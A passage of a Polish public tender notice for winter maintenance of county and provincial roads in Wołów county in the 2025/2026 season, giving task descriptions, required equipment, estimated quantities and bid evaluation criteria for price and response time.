utrzymanie gotowości (akcji biernej) do wykonania zamówienia dla zadania nr 2 w sezonie zimowym Zamawiający zapłaci Wykonawcy zryczałtowaną stawkę w wysokości: 2 500,00 zł netto miesięcznie.<br/><br/>Zakres i wymagania dotyczące wykonania przedmiotu zamówienia określają dodatkowo: <br/>1)	Wykaz dróg i Standardy ZUD – załącznik nr 6 do SWZ<br/>2)	Projekt umowy – załącznik nr 7 do SWZ<br/>3)	Szczegółowe Specyfikacje Techniczne – załącznik nr 8 do SWZ<br/><br/>Szczegóły zawarte w Rozdz. 4 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się poniższymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>1)	ZADANIA NR 2 (świadczenie usług przy ZUD)<br/><br/>l.p.	Kryterium	Waga – udział w ocenie<br/>1.	Cena oferty brutto (C)	60% = 60 pkt<br/>2.	Czas podstawienia sprzętu (T)	40% = 40 pkt<br/><br/>Kryterium „CENA” (C)<br/>Kryterium to będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia (zadania 1-4) – suma cen składowych wpisanych przez Wykonawcę w formularzu oferty, na podstawie formularza cenowego. <br/>Przyjmuje się, że najwyższą ilość punktów, tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach na wykonanie zamówienia objętego zamówieniem (zadania). <br/><br/>Ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/><br/>Cena najniższa brutto<br/>C = ----------------------------------------------- x 60 pkt<br/>Cena oferty ocenianej brutto<br/> <br/>	Uzyskana liczba punktów w ramach kryterium „cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/>Kryterium „CZAS PODSTAWIENIA SPRZĘTU” (T)<br/>Kryterium to oznacza czas podstawienia sprzętu liczony od chwili powiadomienia Wykonawcy przez Dyżurnego ZUD z ramienia Zamawiającego do momentu stawienia się na bazie Wykonawcy jednostki sprzętowo-transportowej, sprawnej technicznie, zatankowanej i załadowanej mieszanką uszorstniającą. <br/>W ww. kryterium można uzyskać maksymalnie 40 punktów.<br/><br/>Maksymalny czas podstawienia sprzętu od momentu wezwania przez Zamawiającego wynosi – 2 godziny.<br/><br/>Oferty w niniejszym kryterium będą ocenione następująco: <br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 2 godz. otrzymają 0 pkt.<br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 1,5 godz. otrzymają 20 pkt <br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 1 godz. otrzymają 40 pkt<br/> <br/>W przypadku podania w ofercie okresu pośredniego (innego niż okres 1, 1,5, 2, godziny), w ocenie ofert (kryteria oceny) będzie decydować wartość mniejsza spełniająca granicę danego poziomu. <br/>Dla oferty, w której wykonawca nie wskazał czasu podstawienia sprzętu, Zamawiający przyjmie najdłuższy przewidziany czas tj. powyżej 2 godz. <br/>Dla oferty, w której wykonawca wskazał czas podstawienia sprzętu krótszy od 1 godz., Zamawiający przyjmie do oceny ofert punktację za najkrótszy przewidziany czas tj. 1 godz. <br/> <br/>Suma punktów uzyskanych w kryteriach „cena” oraz „czas reakcji” stanowić będzie o ogólnej sumie punktów uzyskanych przez ofertę.<br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą łączną ilość punktów wg powyższych zasad. Ocenie podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i czasu reakcji Zmawiający spośród tych ofert wybierze ofertę z najniższą ceną jednostkową za środki sprzętowo-transportowe do odśnieżania i usuwania śliskości zimowej (pługo-piaskarka), a jeżeli zostaną złożone oferty o takiej samej cenie, Zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Nazwa zamówienia: Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie zimowym 2025/2026.<br/>2.	Przedmiotem zamówienia jest świadczenie usług związanych z zimowym utrzymaniem dróg w celu złagodzenia skutków zimy, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego, wywołanymi takimi czynnikami atmosferycznymi jak śliskość zimowa i opady śniegu i polegać będzie na utrzymaniu pasa drogowego zgodnie z przyjętymi standardami zimowego utrzymania dróg oraz zasadami odśnieżania i usuwania śliskości zimowej na drogach powiatowych i wojewódzkich na terenie powiatu wołowskiego – na jezdni głównej oraz obiektach towarzyszących tj. przystankach komunikacji zbiorowej, zatokach postojowych, placach, parkingach pasach dla rowerów, skrzyżowaniach z drogami o nawierzchni bitumicznej.<br/><br/>3.3.	Zadanie nr 3 – Świadczenie usług przy zimowym utrzymaniu dróg powiatowych na terenie gminy Wołów<br/><br/>1)	Do realizacji zamówienia Wykonawca zapewni: <br/>a)	piaskarki o ładowności min. 8 ton (pojemność zasobnika na mieszankę piaskowo-solną) – 2 szt.<br/>b)	pługi minimum średnie sterowane hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu – 2 szt. <br/>c)	nośniki:<br/>- samochód o ładowności min. 16 ton z napędem na dwie osie – 2 szt.<br/>- lub ciągnik rolniczy z napędem na dwie osie o mocy 115 KM i osiągającym prędkość min. 40 km/godz. – 2 szt.<br/><br/>2)	Przewidywane ilości usług (akcja czynna) na sezon zimowy 2025/2026:<br/>a)	długość dróg: 95,170 km<br/>b)	dla pługopiaskarki : 70 godzin pracy wraz z miesięczną gotowością<br/>c)	wykonanie 25% mieszanki uszorstniającej (piaskowo-solnej) w ilości 130 Mg i rozliczanej wg faktycznego zużycia <br/>Podane powyżej ilości czasu pracy i ton mieszanki są jedynie szacunkowe i mogą ulec zmianie w zależności od warunków atmosferycznych i potrzeb na drogach.<br/><br/>3)	Za utrzymanie gotowości (akcji biernej) do wykonania zamówienia dla zadania nr 1 w sezonie zimowym Zamawiający zapłaci Wykonawcy zryczałtowaną stawkę w wysokości: 2 500,00 zł netto miesięcznie. <br/><br/>Zakres i wymagania dotyczące wykonania przedmiotu zamówienia określają dodatkowo: <br/>1)	Wykaz dróg i Standardy ZUD – załącznik nr 6 do SWZ<br/>2)	Projekt umowy – załącznik nr 7 do SWZ<br/>3)	Szczegółowe Specyfikacje Techniczne – załącznik nr 8 do SWZ<br/><br/>Szczegóły zawarte w Rozdz. 4 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się poniższymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>1)	ZADANIA NR 3 (świadczenie usług przy ZUD)<br/><br/>l.p.	Kryterium	Waga – udział w ocenie<br/>1.	Cena oferty brutto (C)	60% = 60 pkt<br/>2.	Czas podstawienia sprzętu (T)	40% = 40 pkt<br/><br/>Kryterium „CENA” (C)<br/>Kryterium to będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia (zadania 1-4) – suma cen składowych wpisanych przez Wykonawcę w formularzu oferty, na podstawie formularza cenowego. <br/>Przyjmuje się, że najwyższą ilość punktów, tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach na wykonanie zamówienia objętego zamówieniem (zadania). <br/><br/>Ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/><br/>Cena najniższa brutto<br/>C = ----------------------------------------------- x 60 pkt<br/>Cena oferty ocenianej brutto<br/> <br/>	Uzyskana liczba punktów w ramach kryterium „cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/>Kryterium „CZAS PODSTAWIENIA SPRZĘTU” (T)<br/>Kryterium to oznacza czas podstawienia sprzętu liczony od chwili powiadomienia Wykonawcy przez Dyżurnego ZUD z ramienia Zamawiającego do momentu stawienia się na bazie Wykonawcy jednostki sprzętowo-transportowej, sprawnej technicznie, zatankowanej i załadowanej mieszanką uszorstniającą. <br/>W ww. kryterium można uzyskać maksymalnie 40 punktów.<br/><br/>Maksymalny czas podstawienia sprzętu od momentu wezwania przez Zamawiającego wynosi – 2 godziny.<br/><br/>Oferty w niniejszym kryterium będą ocenione następująco: <br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 2 godz. otrzymają 0 pkt.<br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 1,5 godz. otrzymają 20 pkt <br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 1 godz. otrzymają 40 pkt<br/> <br/>W przypadku podania w ofercie okresu pośredniego (innego niż okres 1, 1,5, 2, godziny), w ocenie ofert (kryteria oceny) będzie decydować wartość mniejsza spełniająca granicę danego poziomu. <br/>Dla oferty, w której wykonawca nie wskazał czasu podstawienia sprzętu, Zamawiający przyjmie najdłuższy przewidziany czas tj. powyżej 2 godz. <br/>Dla oferty, w której wykonawca wskazał czas podstawienia sprzętu krótszy od 1 godz., Zamawiający przyjmie do oceny ofert punktację za najkrótszy przewidziany czas tj. 1 godz. <br/> <br/>Suma punktów uzyskanych w kryteriach „cena” oraz „czas reakcji” stanowić będzie o ogólnej sumie punktów uzyskanych przez ofertę.<br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą łączną ilość punktów wg powyższych zasad. Ocenie podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i czasu reakcji Zmawiający spośród tych ofert wybierze ofertę z najniższą ceną jednostkową za środki sprzętowo-transportowe do odśnieżania i usuwania śliskości zimowej (pługo-piaskarka), a jeżeli zostaną złożone oferty o takiej samej cenie, Zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Nazwa zamówienia: Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie zimowym 2025/2026.<br/>2.	Przedmiotem zamówienia jest świadczenie usług związanych z zimowym utrzymaniem dróg w celu złagodzenia skutków zimy, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego, wywołanymi takimi czynnikami atmosferycznymi jak śliskość zimowa i opady śniegu i polegać będzie na utrzymaniu pasa drogowego zgodnie z przyjętymi standardami zimowego utrzymania dróg oraz zasadami odśnieżania i usuwania śliskości zimowej na drogach powiatowych i wojewódzkich na terenie powiatu wołowskiego – na jezdni głównej oraz obiektach towarzyszących tj. przystankach komunikacji zbiorowej, zatokach postojowych, placach, parkingach pasach dla rowerów, skrzyżowaniach z drogami o nawierzchni bitumicznej.<br/><br/>Zadanie nr 4 – Świadczenie usług przy zimowym utrzymaniu dróg powiatowych na terenie gminy Brzeg Dolny<br/><br/>1)	Do realizacji zamówienia Wykonawca zapewni: <br/>a)	piaskarki o ładowności min. 8 ton (pojemność zasobnika na mieszankę piaskowo-solną) – 1 szt.<br/>b)	pługi minimum średnie sterowane hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu – 1 szt. <br/>c)	nośniki:<br/>- samochód o ładowności min. 16 t z napędem na dwie osie – 1 szt.<br/>- lub ciągnik rolniczy z napędem na dwie osie o mocy 115 KM i osiągającym prędkość min. 40 km/godz. – 1 szt.<br/><br/>2)	Przewidywane ilości usług (akcja czynna) na sezon zimowy 2025/2026:<br/>a)	długość dróg: 29,430 km<br/>b)	dla pługopiaskarki : 30 godzin pracy wraz z miesięczną gotowością<br/>c)	wykonanie 25% mieszanki uszorstniającej (piaskowo-solnej) w ilości 40 Mg i rozliczanej wg faktycznego zużycia <br/>Podane powyżej ilości czasu pracy i ton mieszanki są jedynie szacunkowe i mogą ulec zmianie w zależności od warunków atmosferycznych i potrzeb na drogach.<br/><br/>3)	Za utrzymanie gotowości (akcji biernej) do wykonania zamówienia dla zadania nr 1 w sezonie zimowym Zamawiający zapłaci Wykonawcy zryczałtowaną stawkę w wysokości: 1 500,00 zł netto miesięcznie.<br/><br/>Zakres i wymagania dotyczące wykonania przedmiotu zamówienia określają dodatkowo: <br/>1)	Wykaz dróg i Standardy ZUD – załącznik nr 6 do SWZ<br/>2)	Projekt umowy – załącznik nr 7 do SWZ<br/>3)	Szczegółowe Specyfikacje Techniczne – załącznik nr 8 do SWZ<br/><br/>Szczegóły zawarte w Rozdz. 4 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się poniższymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>1)	ZADANIA NR 4 (świadczenie usług przy ZUD)<br/><br/>l.p.	Kryterium	Waga – udział w ocenie<br/>1.	Cena oferty brutto (C)	60% = 60 pkt<br/>2.	Czas podstawienia sprzętu (T)	40% = 40 pkt<br/><br/>Kryterium „CENA” (C)<br/>Kryterium to będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia (zadania 1-4) – suma cen składowych wpisanych przez Wykonawcę w formularzu oferty, na podstawie formularza cenowego. <br/>Przyjmuje się, że najwyższą ilość punktów, tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach na wykonanie zamówienia objętego zamówieniem (zadania). <br/><br/>Ceny w pozostałych ofertach punktowane będą w oparciu o następujący wzór:<br/><br/>Cena najniższa brutto<br/>C = ----------------------------------------------- x 60 pkt<br/>Cena oferty ocenianej brutto<br/> <br/>	Uzyskana liczba punktów w ramach kryterium „cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/>Kryterium „CZAS PODSTAWIENIA SPRZĘTU” (T)<br/>Kryterium to oznacza czas podstawienia sprzętu liczony od chwili powiadomienia Wykonawcy przez Dyżurnego ZUD z ramienia Zamawiającego do momentu stawienia się na bazie Wykonawcy jednostki sprzętowo-transportowej, sprawnej technicznie, zatankowanej i załadowanej mieszanką uszorstniającą. <br/>W ww. kryterium można uzyskać maksymalnie 40 punktów.<br/><br/>Maksymalny czas podstawienia sprzętu od momentu wezwania przez Zamawiającego wynosi – 2 godziny.<br/><br/>Oferty w niniejszym kryterium będą ocenione następująco: <br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 2 godz. otrzymają 0 pkt.<br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 1,5 godz. otrzymają 20 pkt <br/>-oferty z zadeklarowanym czasem podstawienia sprzętu 1 godz. otrzymają 40 pkt<br/> <br/>W przypadku podania w ofercie okresu pośredniego (innego niż okres 1, 1,5, 2, godziny), w ocenie ofert (kryteria oceny) będzie decydować wartość mniejsza spełniająca granicę danego poziomu. <br/>Dla oferty, w której wykonawca nie wskazał czasu podstawienia sprzętu, Zamawiający przyjmie najdłuższy przewidziany czas tj. powyżej 2 godz. <br/>Dla oferty, w której wykonawca wskazał czas podstawienia sprzętu krótszy od 1 godz., Zamawiający przyjmie do oceny ofert punktację za najkrótszy przewidziany czas tj. 1 godz. <br/> <br/>Suma punktów uzyskanych w kryteriach „cena” oraz „czas reakcji” stanowić będzie o ogólnej sumie punktów uzyskanych przez ofertę.<br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą łączną ilość punktów wg powyższych zasad. Ocenie podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i czasu reakcji Zmawiający spośród tych ofert wybierze ofertę z najniższą ceną jednostkową za środki sprzętowo-transportowe do odśnieżania i usuwania śliskości zimowej (pługo-piaskarka), a jeżeli zostaną złożone oferty o takiej samej cenie, Zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Nazwa zamówienia: Zimowe utrzymanie dróg powiatowych i wojewódzkich na terenie powiatu wołowskiego w sezonie zimowym 2025/2026.<br/>2.	Przedmiotem zamówienia jest świadczenie usług związanych z zimowym utrzymaniem dróg w celu złagodzenia skutków zimy, zmniejszenia lub ograniczenia zakłóceń ruchu drogowego, wywołanymi takimi czynnikami atmosferycznymi jak śliskość zimowa i opady śniegu i polegać będzie na utrzymaniu pasa drogowego zgodnie z przyjętymi standardami zimowego utrzymania dróg oraz zasadami odśnieżania i usuwania śliskości zimowej na drogach powiatowych i wojewódzkich na terenie powiatu wołowskiego – na jezdni głównej oraz obiektach towarzyszących tj. przystankach komunikacji zbiorowej, zatokach postojowych, placach, parkingach pasach dla rowerów, skrzyżowaniach z drogami o nawierzchni bitumicznej.<br/><br/>Zadanie nr 5 – Montaż i demontaż siatki przeciwśnieżnej na DW nr 338 <br/><br/>1)	Do realizacji zamówienia Wykonawca zapewni: <br/>a)	samochód ciężarowy lub ciągnik rolniczy – 1 szt.<br/><br/>2)	Przewidywane ilości usług na sezon zimowy 2025/2026:<br/>a)	lokalizacja – odcinek DW 338 miedzy miejscowościami Mojęcice i Kąty<br/>b)	długość siatki – 2,1 km (siatka po stronie Zamawiającego) <br/>c)	paliki drewniane i drut naciągowy po stronie Wykonawcy<br/><br/>Zakres i wymagania dotyczące wykonania przedmiotu zamówienia określają dodatkowo: <br/>1)	Wykaz dróg i Standardy ZUD – załącznik nr 6 do SWZ<br/>2)	Projekt umowy – załącznik nr 7 do SWZ<br/>3)	Szczegółowe Specyfikacje Techniczne – załącznik nr 8 do SWZ<br/><br/>Szczegóły zawarte w Rozdz. 4 SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się poniższymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>2)	ZADANIE NR 5 (montaż/demontaż siatki p/śnieżnej)<br/><br/>l.p.	Kryterium	Waga – udział w ocenie<br/>1.	Cena oferty brutto (C) 60% = 60 pkt<br/>2.	Czas reakcji w celu naprawienia uszkodzonej siatki i palików (R) 40% = 40 pkt<br/><br/>Kryterium „CENA”<br/>Kryterium to będzie rozpatrywane na podstawie ceny ofertowej brutto za wykonanie przedmiotu zamówienia (zadania 8) wpisanej przez wykonawcę w formularzu oferty, na podstawie formularza cenowego.<br/>Przyjmuje się, że najwyższą ilość punktów, tj. 60 otrzyma cena najniższa wśród cen zawartych w ofertach na wykonanie zamówienia objętego zamówieniem (zadania). <br/><br/>Cena najniższa brutto<br/>C = ----------------------------------------------- x 60 pkt<br/>Cena oferty ocenianej brutto<br/> <br/>	Uzyskana liczba punktów w ramach kryterium „cena” zaokrąglana będzie do drugiego miejsca po przecinku.<br/>Kryterium „CZAS REAKCJI W CELU NAPRAWIENIA USZKODZONEJ SIATKI I PALIKÓW”<br/>Kryterium to będzie rozpatrywane na podstawie długości czasu reakcji Wykonawcy na wezwanie Zamawiającego w celu naprawienia uszkodzonej siatki przeciwśnieżnej lub palików, zadeklarowanej przez wykonawcę w ofercie.<br/>W ww. kryterium można uzyskać maksymalnie 40 punktów.<br/><br/>Maksymalny czas reakcji od momentu wezwania przez Zamawiającego wynosi – 24 godziny.<br/><br/>Oferty w niniejszym kryterium będą ocenione następująco: <br/>-oferty z zadeklarowanym czasem reakcji 24 godz. otrzymają 0 pkt.<br/>-oferty z zadeklarowanym czasem reakcji 18 godz. otrzymają 20 pkt <br/>-oferty z zadeklarowanym czasem reakcji 12 godz. otrzymają 40 pkt<br/> <br/>W przypadku podania w ofercie okresu pośredniego (innego niż okres 12, 18, 24 godziny), w ocenie ofert (kryteria oceny) będzie decydować wartość mniejsza spełniająca granicę danego poziomu. <br/>Dla oferty, w której wykonawca nie wskazał czasu reakcji, Zamawiający przyjmie najdłuższy przewidziany czas tj. powyżej 24 godz. <br/>Dla oferty, w której wykonawca wskazał czas reakcji krótszy od 12 godz., Zamawiający przyjmie do oceny ofert punktację za najkrótszy przewidziany czas tj. 12 godz. <br/><br/>Suma punktów uzyskanych w kryteriach „cena” oraz „czas reakcji w celu naprawienia uszkodzonej siatki i palików” stanowić będzie o ogólnej sumie punktów uzyskanych przez ofertę.<br/><br/>	Za najkorzystniejszą zostanie uznana oferta, która uzyska największą łączną ilość punktów wg powyższych zasad. Ocenie podlegać będą wyłącznie oferty nie podlegające odrzuceniu.<br/>Jeżeli nie będzie można wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawiać będzie taki sam bilans ceny i czasu reakcji w celu naprawienia uszkodzonej siatki i palików, zamawiający spośród tych ofert wybierze ofertę z najniższą ceną brutto za montaż i demontaż siatki, a jeżeli zostaną złożone oferty o takiej samej cenie, zamawiający wezwie wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji w celu naprawienia uszkodzonej siatki i palików</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1. zdolności technicznej lub zawodowej:<br/>- warunek zostanie spełniony jeżeli Wykonawca wykaże, że na czas realizacji zamówienia dysponuje lub będzie dysponował niżej wymienionym sprzętem<br/><br/>Zadanie nr 1, 2, 3<br/>- piaskarki o ładowności (pojemność zasobnika na mieszankę piaskowo-solną) min. 8 ton – 2 szt. <br/>- pługi minimum średnie sterowane hydraulicznie z kabiny kierowcy z dociskiem oraz możliwością skrętu – 2 szt.<br/>- nośniki - samochody o ładowności min. 16 ton (dwie osie napędowe) na które zamontowane zostaną piaskarki – 2 szt.<br/>- lub ciągnik rolniczy z napędem na dwie osie o mocy 115 KM i osiągającym prędkość min. 40 km/godz. na który zamontowane zostaną piaskarki – 2 szt. <br/><br/>Zadanie nr 4<br/>- piaskarki o ładowności (pojemność zasobnika 